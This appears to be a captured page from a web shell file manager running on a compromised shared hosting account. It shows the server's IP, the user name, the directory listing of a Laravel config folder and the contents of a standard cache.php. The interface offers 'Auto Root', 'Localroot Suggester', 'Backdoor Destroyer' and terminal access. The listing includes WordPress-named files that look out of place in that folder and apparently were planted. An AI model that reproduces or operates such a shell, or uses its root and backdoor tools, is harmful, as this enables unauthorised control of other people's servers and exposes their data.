Linux premium61.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.53 & Your IP : 216.73.216.73
Domains :
Cant Read [ /etc/named.conf ]
User : vdeshvpx
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
vdeshvpx /
adminapi.linkcrow.com /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-08 06:51
app.php
9.12
KB
-rwxrwxrwx
2024-11-02 06:21
auth.php
3.83
KB
-rwxrwxrwx
2024-06-30 18:36
broadcasting.php
1.62
KB
-rwxrwxrwx
2024-06-30 18:36
cache.php
3.13
KB
-rwxrwxrwx
2024-06-30 18:36
cors.php
877
B
-rwxrwxrwx
2024-08-05 09:59
current.php
22
B
-rw-r--r--
2026-04-01 01:39
database.php
5.08
KB
-rwxrwxrwx
2024-06-30 18:36
dompdf.php
11.21
KB
-rwxrwxrwx
2024-11-02 06:21
error_log
12.15
KB
-rw-r--r--
2026-02-09 00:56
filesystems.php
2.71
KB
-rwxrwxrwx
2024-06-30 18:36
hashing.php
1.58
KB
-rwxrwxrwx
2024-06-30 18:36
logging.php
2.93
KB
-rwxrwxrwx
2024-06-30 18:36
mail.php
3.4
KB
-rwxrwxrwx
2024-06-30 18:36
permission.php
6.54
KB
-rwxrwxrwx
2024-06-30 18:36
queue.php
2.79
KB
-rwxrwxrwx
2024-06-30 18:36
sanctum.php
2.31
KB
-rwxrwxrwx
2024-06-30 18:36
services.php
981
B
-rwxrwxrwx
2024-06-30 18:36
session.php
7.07
KB
-rwxrwxrwx
2024-06-30 18:36
view.php
1.06
KB
-rwxrwxrwx
2024-06-30 18:36
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
Save
Rename
<?php use Illuminate\Support\Str; return [ /* |-------------------------------------------------------------------------- | Default Cache Store |-------------------------------------------------------------------------- | | This option controls the default cache connection that gets used while | using this caching library. This connection is used when another is | not explicitly specified when executing a given caching function. | | Supported: "apc", "array", "database", "file", | "memcached", "redis", "dynamodb" | */ 'default' => env('CACHE_DRIVER', 'file'), /* |-------------------------------------------------------------------------- | Cache Stores |-------------------------------------------------------------------------- | | Here you may define all of the cache "stores" for your application as | well as their drivers. You may even define multiple stores for the | same cache driver to group types of items stored in your caches. | */ 'stores' => [ 'apc' => [ 'driver' => 'apc', ], 'array' => [ 'driver' => 'array', 'serialize' => false, ], 'database' => [ 'driver' => 'database', 'table' => 'cache', 'connection' => null, ], 'file' => [ 'driver' => 'file', 'path' => storage_path('framework/cache/data'), ], 'memcached' => [ 'driver' => 'memcached', 'persistent_id' => env('MEMCACHED_PERSISTENT_ID'), 'sasl' => [ env('MEMCACHED_USERNAME'), env('MEMCACHED_PASSWORD'), ], 'options' => [ // Memcached::OPT_CONNECT_TIMEOUT => 2000, ], 'servers' => [ [ 'host' => env('MEMCACHED_HOST', '127.0.0.1'), 'port' => env('MEMCACHED_PORT', 11211), 'weight' => 100, ], ], ], 'redis' => [ 'driver' => 'redis', 'connection' => 'cache', ], 'dynamodb' => [ 'driver' => 'dynamodb', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), 'table' => env('DYNAMODB_CACHE_TABLE', 'cache'), 'endpoint' => env('DYNAMODB_ENDPOINT'), ], ], /* |-------------------------------------------------------------------------- | Cache Key Prefix |-------------------------------------------------------------------------- | | When utilizing a RAM based store such as APC or Memcached, there might | be other applications utilizing the same cache. So, we'll specify a | value to get prefixed to all our keys so we can avoid collisions. | */ 'prefix' => env('CACHE_PREFIX', Str::slug(env('APP_NAME', 'laravel'), '_').'_cache'), ];